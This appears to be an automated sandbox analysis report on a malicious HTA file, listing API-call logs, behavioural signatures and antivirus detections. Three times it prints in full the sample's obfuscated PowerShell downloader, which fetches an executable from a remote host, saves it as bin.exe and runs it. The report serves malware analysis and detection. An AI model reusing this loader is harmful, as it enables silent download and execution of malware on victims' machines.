NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02961000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02962000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02963000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02964000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02965000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02966000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02967000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02968000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02969000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0296a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0296b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0296c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0296d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0296e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0296f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02971000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02972000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02973000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02974000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -ExecutionPolicy UnRestricted function qpJjHLDo($uVcbIsX, $eaLSsHWCCXN){[IO.File]::WriteAllBytes($uVcbIsX, $eaLSsHWCCXN)};function DVBeAgXGLcA($uVcbIsX){if($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74780,74788,74788))) -eq $True){rundll32.exe $uVcbIsX }elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74792,74795,74729))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $uVcbIsX}elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74789,74795,74785))) -eq $True){misexec /qn /i $uVcbIsX}else{Start-Process $uVcbIsX}};function KZTnGLuIim($PUvDBgveWwSt){$GeYZtqmLiNmKNhsptsUr = New-Object (EPzzBsdceWQKTROW @(74758,74781,74796,74726,74767,74781,74778,74747,74788,74785,74781,74790,74796));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$eaLSsHWCCXN = $GeYZtqmLiNmKNhsptsUr.DownloadData($PUvDBgveWwSt);return $eaLSsHWCCXN};function EPzzBsdceWQKTROW($ROcJgaV){$kPpvRDRSpOgSD=74680;$WXEChlqT=$Null;foreach($oFldbbbrBOt in $ROcJgaV){$WXEChlqT+=[char]($oFldbbbrBOt-$kPpvRDRSpOgSD)};return $WXEChlqT};function SVCwtRUGvOCbMZRV(){$uKZbujBvJ = $env:AppData + '\';$kzCLtclO = $uKZbujBvJ + 'bin.exe'; if (Test-Path -Path $kzCLtclO){DVBeAgXGLcA $kzCLtclO;}Else{ $cdRgfZr = KZTnGLuIim (EPzzBsdceWQKTROW @(74784,74796,74796,74792,74738,74727,74727,74777,74794,74789,74777,74790,74777,74801,74781,74783,74784,74726,74779,74791,74789,74727,74794,74781,74777,74780,74789,74781,74727,74778,74785,74790,74726,74781,74800,74781));qpJjHLDo $kzCLtclO $cdRgfZr;DVBeAgXGLcA $kzCLtclO;};;;;}SVCwtRUGvOCbMZRV;

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function qpJjHLDo($uVcbIsX, $eaLSsHWCCXN){[IO.File]::WriteAllBytes($uVcbIsX, $eaLSsHWCCXN)};function DVBeAgXGLcA($uVcbIsX){if($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74780,74788,74788))) -eq $True){rundll32.exe $uVcbIsX }elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74792,74795,74729))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $uVcbIsX}elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74789,74795,74785))) -eq $True){misexec /qn /i $uVcbIsX}else{Start-Process $uVcbIsX}};function KZTnGLuIim($PUvDBgveWwSt){$GeYZtqmLiNmKNhsptsUr = New-Object (EPzzBsdceWQKTROW @(74758,74781,74796,74726,74767,74781,74778,74747,74788,74785,74781,74790,74796));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$eaLSsHWCCXN = $GeYZtqmLiNmKNhsptsUr.DownloadData($PUvDBgveWwSt);return $eaLSsHWCCXN};function EPzzBsdceWQKTROW($ROcJgaV){$kPpvRDRSpOgSD=74680;$WXEChlqT=$Null;foreach($oFldbbbrBOt in $ROcJgaV){$WXEChlqT+=[char]($oFldbbbrBOt-$kPpvRDRSpOgSD)};return $WXEChlqT};function SVCwtRUGvOCbMZRV(){$uKZbujBvJ = $env:AppData + '\';$kzCLtclO = $uKZbujBvJ + 'bin.exe'; if (Test-Path -Path $kzCLtclO){DVBeAgXGLcA $kzCLtclO;}Else{ $cdRgfZr = KZTnGLuIim (EPzzBsdceWQKTROW @(74784,74796,74796,74792,74738,74727,74727,74777,74794,74789,74777,74790,74777,74801,74781,74783,74784,74726,74779,74791,74789,74727,74794,74781,74777,74780,74789,74781,74727,74778,74785,74790,74726,74781,74800,74781));qpJjHLDo $kzCLtclO $cdRgfZr;DVBeAgXGLcA $kzCLtclO;};;;;}SVCwtRUGvOCbMZRV;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Nov. 11, 2024, 10:11 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function qpJjHLDo($uVcbIsX, $eaLSsHWCCXN){[IO.File]::WriteAllBytes($uVcbIsX, $eaLSsHWCCXN)};function DVBeAgXGLcA($uVcbIsX){if($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74780,74788,74788))) -eq $True){rundll32.exe $uVcbIsX }elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74792,74795,74729))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $uVcbIsX}elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74789,74795,74785))) -eq $True){misexec /qn /i $uVcbIsX}else{Start-Process $uVcbIsX}};function KZTnGLuIim($PUvDBgveWwSt){$GeYZtqmLiNmKNhsptsUr = New-Object (EPzzBsdceWQKTROW @(74758,74781,74796,74726,74767,74781,74778,74747,74788,74785,74781,74790,74796));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$eaLSsHWCCXN = $GeYZtqmLiNmKNhsptsUr.DownloadData($PUvDBgveWwSt);return $eaLSsHWCCXN};function EPzzBsdceWQKTROW($ROcJgaV){$kPpvRDRSpOgSD=74680;$WXEChlqT=$Null;foreach($oFldbbbrBOt in $ROcJgaV){$WXEChlqT+=[char]($oFldbbbrBOt-$kPpvRDRSpOgSD)};return $WXEChlqT};function SVCwtRUGvOCbMZRV(){$uKZbujBvJ = $env:AppData + '\';$kzCLtclO = $uKZbujBvJ + 'bin.exe'; if (Test-Path -Path $kzCLtclO){DVBeAgXGLcA $kzCLtclO;}Else{ $cdRgfZr = KZTnGLuIim (EPzzBsdceWQKTROW @(74784,74796,74796,74792,74738,74727,74727,74777,74794,74789,74777,74790,74777,74801,74781,74783,74784,74726,74779,74791,74789,74727,74794,74781,74777,74780,74789,74781,74727,74778,74785,74790,74726,74781,74800,74781));qpJjHLDo $kzCLtclO $cdRgfZr;DVBeAgXGLcA $kzCLtclO;};;;;}SVCwtRUGvOCbMZRV; filepath: powershell.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 11, 2024, 10:11 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 11, 2024, 10:11 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Roaming\bin.exe

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

File has been identified by 31 AntiVirus engines on VirusTotal as malicious (31 events)

Lionic	Trojan.Script.Valyria.a!c
Cynet	Malicious (score: 99)
CTX	txt.trojan.valyria
Skyhigh	HTA/Downloader.f
ALYac	VB:Trojan.Valyria.7482
VIPRE	VB:Trojan.Valyria.7482
Arcabit	VB:Trojan.Valyria.D1D3A
Symantec	Trojan.Gen.NPE
ESET-NOD32	VBS/Agent.QVR
Avast	Script:SNH-gen [Drp]
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.7482
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	VB:Trojan.Valyria.7482
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft	VB:Trojan.Valyria.7482 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPLT
DrWeb	Trojan.DownLoader46.64932
Ikarus	Trojan.VBS.Agent
FireEye	VB:Trojan.Valyria.7482
Google	Detected
Avira	VBS/Dldr.Agent.VPLT
Kingsoft	Script.Troj.hta.2023141
Microsoft	Trojan:VBS/Valyria.NE!MTB
GData	VB:Trojan.Valyria.7482
Varist	VBS/Agent.AZC!Eldorado
McAfee	HTA/Downloader.f
Tencent	Script.Trojan-Downloader.Generic.Bwnw
huorong	TrojanDownloader/VBS.NetLoader.dt
Fortinet	VBS/Agent.BSD!tr
AVG	Script:SNH-gen [Drp]

glued.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All